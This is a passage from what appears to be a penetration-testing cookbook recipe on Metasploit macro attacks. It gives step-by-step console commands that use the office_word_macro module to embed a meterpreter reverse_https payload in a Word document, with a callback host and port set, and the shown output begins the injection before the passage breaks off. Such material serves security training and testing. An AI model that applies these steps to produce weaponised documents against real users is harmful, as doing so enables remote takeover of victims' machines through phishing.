Metasploit macro exploits
Macro attacks are probably one of the most frequently used methods when it comes to compromising client machines, and since macros are used for business-related tasks, they will be around for a long time.
How to do it...
- In this recipe, we will use the Microsoft Office Word Malicious Macro Execution exploit module to inject a malicious macro into a Microsoft Office Word document:
msf > use exploit/multi/fileformat/office_word_macro msf exploit(multi/fileformat/office_word_macro) > set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_https msf exploit(multi/fileformat/office_word_macro) > set LHOST 192.168.216.5 LHOST => 192.168.216.5 msf exploit(multi/fileformat/office_word_macro) > set LPORT 443 LPORT => 443 msf exploit(multi/fileformat/office_word_macro) > exploit [*] Using template: /usr/share/metasploit-framework/data/exploits/office_word_macro/template.docx [*] Injecting payload in document comments ...